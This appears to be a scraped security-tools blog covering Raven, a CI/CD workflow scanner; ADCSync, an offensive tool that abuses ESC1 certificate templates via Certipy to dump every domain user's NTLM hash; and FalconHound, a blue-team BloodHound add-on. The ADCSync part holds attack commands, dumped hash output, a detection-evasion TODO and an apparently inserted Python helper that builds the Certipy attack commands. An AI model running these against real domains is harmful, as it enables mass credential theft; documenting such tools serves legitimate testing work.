[--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --org-name ORG_NAME Organization name to download the workflows" dir="auto"><pre><code>usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME<br /><br />options:<br /> -h, --help show this help message and exit<br /> --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)<br /> --debug Whether to print debug statements, default: False<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --org-name ORG_NAME Organization name to download the workflows</code></pre></div> <h4 dir="auto" tabindex="-1">Download Public Repositories</h4> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS] options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --max-stars 
MAX_STARS Maximum number of stars for a repository --min-stars MIN_STARS Minimum number of stars for a repository, default: 1000" dir="auto"><pre><code>usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]<br /><br />options:<br /> -h, --help show this help message and exit<br /> --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)<br /> --debug Whether to print debug statements, default: False<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --max-stars MAX_STARS<br /> Maximum number of stars for a repository<br /> --min-stars MIN_STARS<br /> Minimum number of stars for a repository, default : 1000</code></pre></div> <h3 dir="auto" tabindex="-1">Index</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j] [--debug] options: -h, --help show this help message and exit --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --neo4j-uri NEO4J_URI Neo4j URI endpoint, default: neo4j://localhost:7687 --neo4j-user NEO4J_USER Neo4j username, default: neo4j --neo4j-pass NEO4J_PASS Neo4j password, default: 123456789 --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False --debug Whether to print debug statements, default: False" dir="auto"><pre><code>usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri 
NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]<br /> [--clean-neo4j] [--debug]<br /><br />options:<br /> -h, --help show this help message and exit<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --neo4j-uri NEO4J_URI<br /> Neo4j URI endpoint, default: neo4j://localhost:7687<br /> --neo4j-user NEO4J_USER<br /> Neo4j username, default: neo4j<br /> --neo4j-pass NEO4J_PASS<br /> Neo4j password, default: 123456789<br /> --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False<br /> --debug Whether to print debug statements, default: False</code></pre></div> <h3 dir="auto" tabindex="-1">Report</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j] [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}] [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}] {slack} ... 
positional arguments: {slack} slack Send report to slack channel options: -h, --help show this help message and exit --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --neo4j-uri NEO4J_URI Neo4j URI endpoint, default: neo4j://localhost:7687 --neo4j-user NEO4J_USER Neo4j username, default: neo4j --neo4j-pass NEO4J_PASS Neo4j password, default: 123456789 --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain} Filter queries with specific tag --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical} Filter queries by severity level (default: info) --queries-path QUERIES_PATH, -dp QUERIES_PATH Queries folder (default: library) --format {raw,json}, -f {raw,json} Report format (default: raw)" dir="auto"><pre><code>usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]<br /> [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]<br /> [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]<br /> [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]<br /> {slack} ...<br /><br />positional arguments:<br /> {slack}<br /> slack Send report to slack channel<br /><br />options:<br /> -h, --help show this help message and exit<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --neo4j-uri NEO4J_URI<br /> Neo4j URI endpoint, default: neo4j://localhost:7687<br /> --neo4j-user NEO4J_USER<br /> Neo4j username, default: neo4j<br /> --neo4j-pass NEO4J_PASS<br /> Neo4j password, default: 123456789<br /> 
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False<br /> --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}<br /> Filter queries with specific tag<br /> --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}<br /> Filter queries by severity level (default: info)<br /> --queries-path QUERIES_PATH, -dp QUERIES_PATH<br /> Queries folder (default: library)<br /> --format {raw,json}, -f {raw,json}<br /> Report format (default: raw)</code></pre></div> <h2 dir="auto" tabindex="-1">Examples</h2> <p dir="auto">Retrieve all workflows and actions associated with the organization.</p> <div><pre><code>raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug</code></pre></div> <p dir="auto">Scrape all publicly accessible GitHub repositories.</p> <div><pre><code>raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug</code></pre></div> <p dir="auto">After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.</p> <div><pre><code>raven index --debug</code></pre></div> <p dir="auto">Now, we can generate a report using our query library.</p> <div><pre><code>raven report --severity high --tag injection --tag unauthenticated</code></pre></div> <h2 dir="auto" tabindex="-1">Rate Limiting</h2> <p dir="auto">For effective rate limiting, you should supply a Github token. 
For authenticated users, the following rate limits apply:</p> <ul dir="auto"> <li>Code search - 30 queries per minute</li> <li>Any other API - 5000 per hour</li> </ul> <h2 dir="auto" tabindex="-1">Research Knowledge Base</h2> <ul dir="auto"> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Issue%20Injections/README.md" rel="nofollow" target="_blank" title="Issue Injections">Issue Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Pull%20Request%20Injections/README.md" rel="nofollow" target="_blank" title="Pull Request Injections">Pull Request Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Multi%20Prerequisite%20Exploits/README.md" rel="nofollow" target="_blank" title="Workflow Run Injections">Workflow Run Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Codesee%20Injections/README.md" rel="nofollow" target="_blank" title="CodeSee Injections">CodeSee Injections</a></li> </ul> <h2 dir="auto" tabindex="-1">Current Limitations</h2> <ul dir="auto"> <li>It is possible to run an external action by referencing a folder with a <code>Dockerfile</code> (without <code>action.yml</code>). Currently, this behavior isn't supported.</li> <li>It is possible to run an external action by referencing a Docker container through the <code>docker://...</code> URL. Currently, this behavior isn't supported.</li> <li>It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.</li> <li>We aren't modeling the entire workflow structure. 
If additional fields are needed, please submit a pull request according to the <a href="https://github.com/CycodeLabs/raven/blob/main/CONTRIBUTING.md" rel="nofollow" target="_blank" title="contribution">contribution</a> guidelines.</li> </ul> <h2 dir="auto" tabindex="-1">Future Research Work</h2> <ul dir="auto"> <li>Implementation of taint analysis. Example use case - a user can pass a pull request title (which is a controllable parameter) to an action parameter named <code>data</code>. That action parameter may be used in a run command: <code>- run: echo ${{ inputs.data }}</code>, which creates a path to code execution.</li> <li>Expand the research into harmful misuse of <code>GITHUB_ENV</code>. This may utilize the previous taint analysis as well.</li> <li>Research whether <code>actions/github-script</code> has an interesting threat landscape. If it does, it can be modeled in the graph.</li></ul><h2 dir="auto" tabindex="-1">Want more of CI/CD Security, AppSec, and ASPM? 
Check out Cycode</h2> <p dir="auto">If you liked Raven, you would probably love our <a href="https://cycode.com/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="Cycode">Cycode</a> platform, which offers even more capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.</p> <p dir="auto">If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form at <a href="https://cycode.com/book-a-demo/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="https://cycode.com/book-a-demo/">https://cycode.com/book-a-demo/</a>.</p> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CycodeLabs/raven" rel="nofollow" target="_blank" title="Download Raven">Download Raven</a></span></b></div></div></article>
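Raven's documented authenticated limits (30 code-search queries per minute, 5,000 REST calls per hour) can be respected with a simple fixed-interval pacer. A hedged Python sketch of that idea, not Raven's actual implementation:

```python
import time

class RateLimiter:
    """Naive fixed-interval pacer: spaces calls so a per-window quota isn't exceeded."""
    def __init__(self, max_calls, window_seconds):
        self.interval = window_seconds / max_calls
        self._last = 0.0

    def wait(self):
        # Sleep just long enough that consecutive calls are `interval` seconds apart.
        now = time.monotonic()
        delay = self._last + self.interval - now
        if delay > 0:
            time.sleep(delay)
        self._last = time.monotonic()

# GitHub's documented authenticated limits for this use case:
code_search = RateLimiter(30, 60)     # one code-search query every 2 seconds
rest_api = RateLimiter(5000, 3600)    # one REST call every 0.72 seconds
print(code_search.interval, rest_api.interval)
```

A fixed interval trades burst throughput for simplicity; a token bucket would allow short bursts while keeping the same long-run average.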
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-33797241161437681462024-02-18T15:51:00.000-08:002024-02-18T15:51:12.125-08:00ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes<article><div class="post-body entry-content" id="post-body-1232537971106150805" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9oNOzs5SQLzMkqV4A6SLCl-CitTuQChVQVcCRUpKYwFMrbnc6xdH3opP29Hpo5kUAlbYl7mikD8ArS9A4KugHnfzR0AcDR5AOcEIrVP0PY5bTykTkU4KEL8q6cQutnLpVsCuTKSjk4mF1a-xBsgODDqwH3ZxtQbm5xNwvaVuOj-bd5mEIC0SCJDvOcA8/s1792/ADCSsync.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9oNOzs5SQLzMkqV4A6SLCl-CitTuQChVQVcCRUpKYwFMrbnc6xdH3opP29Hpo5kUAlbYl7mikD8ArS9A4KugHnfzR0AcDR5AOcEIrVP0PY5bTykTkU4KEL8q6cQutnLpVsCuTKSjk4mF1a-xBsgODDqwH3ZxtQbm5xNwvaVuOj-bd5mEIC0SCJDvOcA8/w640-h366/ADCSsync.png" width="640" /></a></div><p><br /></p> <p dir="auto">This is a tool I quickly whipped together to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing <a href="https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" rel="nofollow" target="_blank" title="DRSUAPI">DRSUAPI</a> or <a href="https://book.hacktricks.xyz/windows-hardening/stealing-credentials#volume-shadow-copy" rel="nofollow" target="_blank" title="Volume Shadow Copy">Volume Shadow Copy</a>.</p><span><a name="more"></a></span><p dir="auto"><br /></p> <p dir="auto">This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. 
It still needs a lot of work, and I plan to add more features in the future, such as additional authentication methods and automated discovery of a vulnerable template.</p> <div><pre><code>python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt<br /><br /> ___ ____ ___________<br /> / | / __ \/ ____/ ___/__ ______ _____<br /> / /| | / / / / / \__ \/ / / / __ \/ ___/<br /> / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__<br />/_/ |_/_____/\____//____/\__, /_/ /_/\___/<br /> /____/<br /><br />Grabbing user certs:<br />100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]<br />THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::<br />THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::<br />THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::<br />THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::<br />THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::<br />THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::<br />THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::<br />THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::<br />THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Introduction</h2> <p dir="auto">ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the BloodHound dump file passed in. 
Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete, but offers an alternative way to dump NTLM hashes.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <div><pre><code>git clone https://github.com/JPG0mez/adcsync.git<br />cd adcsync<br />pip3 install -r requirements.txt<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To use this tool, you need the following:</p> <ol dir="auto"> <li>Valid domain credentials</li> <li>A user list from a BloodHound dump, which will be passed in</li> <li>A template vulnerable to ESC1 (found with <code>certipy find</code>)</li> </ol> <div><pre><code># python3 adcsync.py --help<br /> ___ ____ ___________ <br /> / | / __ \/ ____/ ___/__ ______ _____<br /> / /| | / / / / / \__ \/ / / / __ \/ ___/<br /> / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__ <br />/_/ |_/_____/\____//____/\__, /_/ /_/\___/ <br /> /____/ <br /><br />Usage: adcsync.py [OPTIONS]<br /><br />Options:<br /> -f, --file TEXT Input User List JSON file from Bloodhound [required]<br /> -o, --output TEXT NTLM Hash Output file [required]<br /> -ca TEXT Certificate Authority [required]<br /> -dc-ip TEXT IP Address of Domain Controller [required]<br /> -u, --user TEXT Username [required]<br /> -p, --password TEXT Password [required]<br /> -template TEXT Template Name vulnerable to ESC1 [required]<br /> -target-ip TEXT IP Address of the target machine [required]<br /> --help Show this message and exit.<br /><br /></code></pre></div> <h2 dir="auto" tabindex="-1">TODO</h2> <ul dir="auto"> <li>Support alternative authentication methods such as NTLM hashes and ccache files</li> <li>Automatically run "certipy find" to find and grab templates vulnerable to ESC1</li> <li>Add jitter and sleep options to avoid detection</li> <li>Add type validation 
for all variables</li> </ul> <h2 dir="auto" tabindex="-1">Acknowledgements</h2> <ul dir="auto"> <li><a href="https://github.com/puzzlepeaches" rel="nofollow" target="_blank" title="puzzlepeaches">puzzlepeaches</a>: Telling me to hurry up and write this</li> <li><a href="https://github.com/ly4k/Certipy" rel="nofollow" target="_blank" title="ly4k">ly4k</a>: For Certipy</li> <li><a href="https://github.com/WazeHell/vulnerable-AD" rel="nofollow" target="_blank" title="WazeHell">WazeHell</a>: For the script to set up the vulnerable AD environment used for testing</li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JPG0mez/ADCSync" rel="nofollow" target="_blank" title="Download ADCSync">Download ADCSync</a></span></b></div></div></article>
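The per-user loop ADCSync automates can be sketched as follows. The helper only builds the two Certipy command lines for one user — request a certificate through the ESC1-vulnerable template, then authenticate with the resulting PFX to recover the NT hash. Option spellings mirror the post's own examples and are illustrative; this is not a drop-in replacement for adcsync.py.

```python
import shlex

def certipy_commands(upn, opts):
    """Build the two Certipy invocations ADCSync automates per user:
    1. request a certificate for the target UPN via the vulnerable template,
    2. authenticate with the resulting PFX to recover the NT hash.
    Flag names here are illustrative, modeled on the post's usage examples."""
    account = upn.split("@")[0]
    req = (f"certipy req -u {opts['user']} -p {opts['password']} "
           f"-ca {opts['ca']} -template {opts['template']} "
           f"-upn {upn} -target-ip {opts['target_ip']}")
    auth = f"certipy auth -pfx {account}.pfx -dc-ip {opts['dc_ip']}"
    return shlex.split(req), shlex.split(auth)

opts = {"user": "clu", "password": "theperfectsystem",
        "ca": "THEGRID-KFLYNN-DC-CA", "template": "SmartCard",
        "target_ip": "192.168.0.98", "dc_ip": "192.168.0.98"}
req, auth = certipy_commands("shirlee.saraann@thegrid.local", opts)
print(req[:2])    # ['certipy', 'req']
print(auth[-1])   # '192.168.0.98'
```

Running these two steps for every user in the BloodHound dump, and parsing the hash out of the second command's output, is essentially the whole tool — which is also why it is slow: two network round-trips per account.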
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-49560965966620194522024-02-18T15:48:00.000-08:002024-02-18T15:48:53.765-08:00FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion<article><div class="post-body entry-content" id="post-body-2815585869362877527" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg1TWTLu2beK5GvgcXGq2HKj_lK1QDSJfmuHU53-6joWc9AJRBpuYKV48KU7oYxF5klFR9HfGBdTdz03YsGJWp-F8oC7CnubvZR9VXbYMURQjxeKO6Kb0auxvNY5AABHm_WdNo4eFePHgGscRqnlkHikG5G_-3eqeRRGMiZDveGOl8rQ3D2oQmliNft_rE6"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7310067022199289682" src="https://blogger.googleusercontent.com/img/a/AVvXsEg1TWTLu2beK5GvgcXGq2HKj_lK1QDSJfmuHU53-6joWc9AJRBpuYKV48KU7oYxF5klFR9HfGBdTdz03YsGJWp-F8oC7CnubvZR9VXbYMURQjxeKO6Kb0auxvNY5AABHm_WdNo4eFePHgGscRqnlkHikG5G_-3eqeRRGMiZDveGOl8rQ3D2oQmliNft_rE6=w400-h400" width="400" /></a></p><p style="text-align: center;"><br /></p> <p dir="auto">FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.</p> <p dir="auto">One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.</p> <p dir="auto">Some of the hardest relationships to gather for BloodHound are local group memberships and session information. As blue teamers, we have this information readily available in our logs. 
FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.</p> <p dir="auto">This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.</p> <p dir="auto">Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.</p> <p dir="auto">Other examples where FalconHound can be used:</p> <ul dir="auto"> <li>Adding, removing or timing out sessions in the graph, based on logon and logoff events.</li> <li>Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.</li> <li>Adding CVE information and whether there is a public exploit available to the graph.</li> <li>All kinds of Azure activities.</li> <li>Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.</li> <li>Adding new users, groups and computers to the graph.</li> <li>Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.</li> </ul> <p dir="auto">The possibilities are endless here. 
Please add more ideas to the issue tracker or submit a PR.</p> <p dir="auto">A blog detailing more on why we developed it and some use case examples can be found <a href="https://medium.com/falconforce/falconhound-attack-path-management-for-blue-teams-42adedc9cae5?source=friends_link&sk=9f64b6b3028c5a2a6087d63b4fd2c82f" rel="nofollow" target="_blank" title="here">here</a></p> <p dir="auto">Index:</p> <ul dir="auto"> <li><a href="https://github.com/FalconForceTeam/FalconHound#supported-data-sources-and-targets" rel="nofollow" target="_blank" title="Supported data sources and targets">Supported data sources and targets</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#installation" rel="nofollow" target="_blank" title="Installation">Installation</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#usage" rel="nofollow" target="_blank" title="Usage">Usage</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#actions" rel="nofollow" target="_blank" title="Actions">Actions</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#extensions-to-the-graph" rel="nofollow" target="_blank" title="Extensions to the graph">Extensions to the graph</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#credential-management" rel="nofollow" target="_blank" title="Credential Management">Credential Management</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#deployment" rel="nofollow" target="_blank" title="Deployment">Deployment</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#license" rel="nofollow" target="_blank" title="License">License</a></li> </ul> <h2 dir="auto" tabindex="-1">Supported data sources and targets</h2> <p dir="auto">FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. 
It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.</p> <p dir="auto">Currently, FalconHound supports the following data sources and/or targets:</p> <ul dir="auto"> <li>Azure Sentinel</li> <li>Azure Sentinel Watchlists</li> <li>Splunk</li> <li>Microsoft Defender for Endpoint</li> <li>Neo4j</li> <li>MS Graph API (early stage)</li> <li>CSV files</li> </ul> <p dir="auto">Additional data sources and targets are planned for the future.</p> <p dir="auto">At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.</p> <hr /> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the <a href="https://github.com/FalconForceTeam/FalconHound/releases" rel="nofollow" target="_blank" title="releases">releases</a> section.</p> <p dir="auto">Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.</p> <h3 dir="auto" tabindex="-1">Requirements</h3> <ul dir="auto"> <li>BloodHound, or at least the Neo4j database for now.</li> <li>A SIEM or other log aggregation tool. 
Currently, Azure Sentinel and Splunk are supported.</li> <li>Credentials for each endpoint you want to talk to, with the <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="required permissions">required permissions</a>.</li> </ul> <h3 dir="auto" tabindex="-1">Configuration</h3> <p dir="auto">FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.</p> <hr /> <h2 dir="auto" tabindex="-1">Usage</h2> <h4 dir="auto" tabindex="-1">Default run</h4> <p dir="auto">To run FalconHound, just run the binary and add the <code>-go</code> parameter to have it run all queries in the actions folder.</p> <div><pre><code>./falconhound -go</code></pre></div> <h4 dir="auto" tabindex="-1">List all enabled actions</h4> <p dir="auto">To list all enabled actions, use the <code>-actionlist</code> parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the <code>-go</code> parameter.</p> <div><pre><code>./falconhound -actionlist -go</code></pre></div> <h3 dir="auto" tabindex="-1">Run with a select set of actions</h3> <p dir="auto">To run a select set of actions, use the <code>-ids</code> parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the <code>-go</code> parameter.</p> <div><pre><code>./falconhound -ids action1,action2,action3 -go</code></pre></div> <h4 dir="auto" tabindex="-1">Run with a different config file</h4> <p dir="auto">By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the <code>-config</code> flag. 
This can allow you to run multiple instances of FalconHound with different configurations, against different environments.</p> <div><pre><code>./falconhound -go -config /path/to/config.yml</code></pre></div> <h4 dir="auto" tabindex="-1">Run with a different actions folder</h4> <p dir="auto">By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the <code>-actions-dir</code> flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.</p> <div><pre><code>./falconhound -go -actions-dir /path/to/actions</code></pre></div> <h4 dir="auto" tabindex="-1">Run with credentials from a keyvault</h4> <p dir="auto">By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the <code>-keyvault</code> flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.</p> <div><pre><code>./falconhound -go -keyvault</code></pre></div> <hr /> <h2 dir="auto" tabindex="-1">Actions</h2> <p dir="auto">Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.</p> <h3 dir="auto" tabindex="-1">Action folder structure</h3> <p dir="auto">The action folder is divided into sub-directories per query source. 
All folders will be processed recursively and all YAML files will be executed in alphabetical order.</p> <p dir="auto">The Neo4j actions <strong>should</strong> be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.</p> <h3 dir="auto" tabindex="-1">Action files</h3> <p dir="auto">All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.</p> <p dir="auto">There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.</p> <p dir="auto">While most items will be fairly self-explanatory, there are some important things to note about actions:</p> <h4 dir="auto" tabindex="-1">Enabled</h4> <p dir="auto">As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.</p> <div><pre><code>Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Debug</h4> <p dir="auto">This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.</p> <div><pre><code>Debug: false</code></pre></div> <h4 dir="auto" tabindex="-1">Query</h4> <p dir="auto">The <code>Query</code> field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your <code>SourcePlatform</code>. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. 
